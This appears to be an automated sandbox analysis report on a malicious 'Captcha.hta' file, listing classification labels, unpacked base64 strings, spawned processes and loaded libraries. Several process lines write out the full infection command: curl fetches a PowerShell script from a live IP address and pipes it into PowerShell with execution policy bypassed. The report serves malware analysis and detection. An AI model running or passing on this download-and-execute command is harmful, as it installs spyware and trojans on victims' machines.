FCeHBDQzFnQkpnTlNCa1FIRVVWWkpndFlGaFlPQjFnU2Nnb2FRbDhNRmhZQmZ4SlRUaFlMREVKVmRoQlpGbE1CRmg5T0MyZ1dRaFpDRWtRY2NBTkNCeFlHQjFvUVlRTkNCeFlBRFZrWkpqVkVDMElITDFNWWFSQlBKbE1PQjFFVWNnY2VLMWdXTWtJSEp
Source: 5.2.powershell.exe.51a01c4.1.raw.unpack, Pls.cs	Base64 encoded string: 'QzpcXFdpbmRvd3NcXE1pY3Jvc29mdC5ORVRcXEZyYW1ld29ya1xcdjQuMC4zMDMxOVxcUmVnQXNtLmV4ZQ=='
Source: 5.2.powershell.exe.51a01c4.1.raw.unpack, Sap.cs	Base64 encoded string: 'RjBVY2FBVVdNVThSRmxNWVBXODhGMFVMREZGVlZSdEZGbE1QVEhJY1p3VllEVVVXQzFVR1BXODhGMFVMREZGVlZSdEZGbE1QVEdRQWFCWmZEMU5NSzFnQll4QlpFbVVIRUVBY1pRZEZXVHRvYnp3RmN3QmFDMVZDQVZvVWRSRVdKMWdGQzFnUVl4QkZiendaYnp4VkprSVdRVVFIQlY4YWFFSjFEVmdVQjBRR2J3MVlMMU1XQ2xrUmRXODhRaFpDUWtZQVpBNWZBUllSRmxjQmJ3RVdLMWdXVXdCVlJRMVlGRk1RRm1JYVR3eENVd0JLQUU4Qll6bHJRa0FERGtNUUtrSmZERUpDRVVJVWRCWi9ERklIR2g5NERFSVdRaFlaYnp4VkprSVdRaFpDUWtRUWNoZEVEQllnQzBJMmFReEFCMFFXQjBSYlVnMS9ERUpUVkI0RFp3NURCeHBDRVVJVWRCWi9ERklIR2g5T0MyZ1dRaFpDSHp0L0MyZ1dRaFpDRWtNWGFndFZRa1VXQTBJY1pVSi9ERUpSVUJZMmFReEFCMFFXTmxrOGFCWUZVQjRBRzBJUVhUOFdGRmNPRjFOWkpndFlGaFlSRmxjSGNpdFlCbE1hU3p0L0prSVdRazF2YUJaVkprSVdRaFpDRUZNQmN4QllRblFMRm5VYWFCUlRFRUlIRUJnaGFTdFlGZ1ZRU2tBVWFoZFRUaFlSRmxjSGNpdFlCbE1hU3cxNERFSVdRaFlmYnp4NERFSVdRaFlTRjFRWmJ3RVdFVUlERmw4V0pnQlBGbE01UHhZMmFReEFCMFFXTmxrM2Z4WlRFUjRMREVKVmNBTmFGMU5MYnp4VkprSVdHVHRvUWhaVkprSVdRaFlRQjBJQWRBd1dJRjhXSVZrYmNBZEVGbE1RVEhFUWNpQlBGbE1SU2tBVWFoZFRTdzF2YUJaVkprSkxienhDUWhaVkpRZFlCa1FIQlY4YWFHODhienhDUWhaVkpSQlRCVjhOREJZMGRndDRBMXNIRVR0L0prSVdRa1lYQUZvY1pVSkZGbGNXQzFWVmRSWkVDMWdGT1d0VlFRZENJMFlMTEZjWVl4RWVTenRvUWhaVkpoazdhQlpDUWhaVkprSVdFRk1XRjBRYkpneFRGUllSRmtRY2FBVnRQenRvUWhaVkprSVdRaFlaYnp4VkprSVdRaFpDUWhaVkprSVVDVk1RREZNWk5WQVVUanRvUWhaVkprSVdRaFpDUWhaVkpBeENCbG9PUUJwNERFSVdRaFpDUWhaVkprSVdRaFF3QjBVQWF3ZGlDa1FIQTFKWEttODhRaFpDUWhaVkprSVdRaFpDUUdFYWNWUUNNVk1XTmw0SFl3TlNJVmtNRmxNTmNrQWFienhDUWhaVkprSVdRaFpDUWhaWFZRZENObDRRQjFjUlJRMVlGbE1hRmhSWkMyZ1dRaFpDUWhaVkprSVdRaFpBTlZrQ01GWnhCMEkyQ2tRUVp3WjFEVmdXQjA0QkpFNDdhQlpDUWhaVkprSVdRaFpDUWhReVl4WmlDa1FIQTFJMmFReENCMDRXUUJwNERFSVdRaFpDUWhaVkprSVdRaFEwQzBRQmN3TmFJMW9PRFZVd2ZrQWFienhDUWhaVkprSVdRaFpDUWhaWFVSQmZGbE15RUZrV1l4RkZMMU1QRFVRTUpFNDdhQlpDUWhaVkprSVdRaFpDUWhRbll3TlNNa1FOQVZNR2RTOVREMWtRR3hSWkMyZ1dRaFpDUWhaVkprSVdRaFpBT0VFZ2FBOVhFbUFMQjBFNllERlRBVUlMRFZoWEttODhRaFpDUWhaVkprSVdRaFpDUUhVSFl3TkNCMllRRFZVUWRSRjNRRHRvUWhaVkprSVdRaFlmV1R0L0prSVdRa3R2YUJaVkprSVZCMWdHRUZNU2J3MVlienh2YUJaVkprSVZFRk1GQzFrYkppTkdDM0lIRGxNU1p4WlRFVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVmJ3eENRbVFIRVVNWVl6WmVFRk1EQm5JUWFnZFJBMElIU244YmNqSkNFQllLQTFnUmFnY2ZXVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVlpBMVpEaFl4QjBJaWFSVUFWbUlLRUZNVVlpRlpERUlIR2tJeFl3NVRCVmNXQng0OGFCWm1Ga1JDRmw0SFl3TlNUaFlMREVJdVcwSlZEVmdXQjA0QkwxazdhQlpDUWhZRmRBdEFBMElIUWxJUWFnZFJBMElIUWxRYWFRNFdNVk1XTmw0SFl3TlNJVmtNRmxNTmNpWlREbE1GQTBJUUxpdFlGbVlXRUJZQmJoQlRBMUpPUWw4YmNqbHJRbFVOREVJUWZoWWZXVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVlpBMVpEaFlsQjBJaWFSVUFWbUlLRUZNVVlpRlpERUlIR2tJeFl3NVRCVmNXQng0OGFCWm1Ga1JDRmw0SFl3TlNUaFlMREVJdVcwSlZEVmdXQjA0QkwxazdhQlpDUWhZRmRBdEFBMElIUWxJUWFnZFJBMElIUWxRYWFRNFdKVk1XTmw0SFl3TlNJVmtNRmxNTmNpWlREbE1GQTBJUUxpdFlGbVlXRUJZQmJoQlRBMUpPUWw4YmNqbHJRbFVOREVJUWZoWWZXVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVmJ3eENRbUFMRUVJQVp3NTNEbG9OQVhNTlFnZGFCMUVERmxOZFR3eENNa0lRUWw0VWFBWmFCeHBDQzFnQkpnTlNCa1FIRVVWWkpndFlGaFlPQjFnU2Nnb2FRbDhNRmhZQmZ4SlRUaFlMREVKVmRoQlpGbE1CRmg5T0MyZ1dRaFpDRWtRY2NBTkNCeFlHQjFvUVlRTkNCeFlBRFZrWkpqVkVDMElITDFNWWFSQlBKbE1PQjFFVWNnY2VLMWdXTWtJSEp

Source: classification engine

Classification label: mal100.phis.troj.spyw.expl.evad.winHTA@14/10@2/2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 8_2_00437DF0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

8_2_00437DF0

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5744:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mli0y3mh.qvs.ps1

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Captcha.hta	Virustotal: Detection: 19%
Source: Captcha.hta	ReversingLabs: Detection: 21%

Source: unknown	Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\Captcha.hta"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bhgto.ps1 \| powershell -NoProfile -ExecutionPolicy Bypass -Command -
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\curl.exe curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bhgto.ps1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -Command -
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0bqs2aon\0bqs2aon.cmdline"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1090.tmp" "c:\Users\user\AppData\Local\Temp\0bqs2aon\CSCCC253661431F432090E0BD8713DD5F5.TMP"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bhgto.ps1 \| powershell -NoProfile -ExecutionPolicy Bypass -Command -	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\curl.exe curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bhgto.ps1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -Command -	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0bqs2aon\0bqs2aon.cmdline"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1090.tmp" "c:\Users\user\AppData\Local\Temp\0bqs2aon\CSCCC253661431F432090E0BD8713DD5F5.TMP"	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msimtf.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: jscript9.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

